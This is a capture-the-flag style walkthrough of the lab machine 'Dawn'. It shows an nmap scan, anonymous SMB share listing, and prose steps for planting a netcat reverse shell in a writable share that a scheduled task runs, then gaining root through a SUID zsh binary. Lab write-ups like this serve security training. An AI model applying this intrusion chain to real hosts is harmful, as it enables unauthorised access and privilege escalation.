Dawn
Nmap
sudo nmap 192.168.152.11 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
Service Info: Host: DAWNOn port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.
smbclient -U '' -L \\\\192.168.152.11\\
Connecting then directly to the ITDEPT share.
I then used curl to test for file upload on the share and confirmed was able to upload a PHP reverse shell which might come in handy for later.
Running dirsearch.py on port 80 reveals two interesting directories.
Moving into logs shows the a list of logs where management.log is the only one we have permission to access
When reading the log file we have the lines below appearing frequently.
Knowing that we have write access to the ITDEPT share we can upload a reverse shell call it web-control and in theory this should execute.
Firstly I created a file called web-control and inserted a netcat reverse shell into it
This was then uploaded to the SMB share.
After doing so I soon receive a shell back on my netcat listener.
Then we can upgrade the shell to something nicer.
After doing so I then transferred over linpeas from my attacking machine by uploading to SMB. After running linpeas we identify the binary zsh as having the SUID bit set.
As zsh is a shell binary all we need to do is execute the full path of zsh to gain a root shell.
Last updated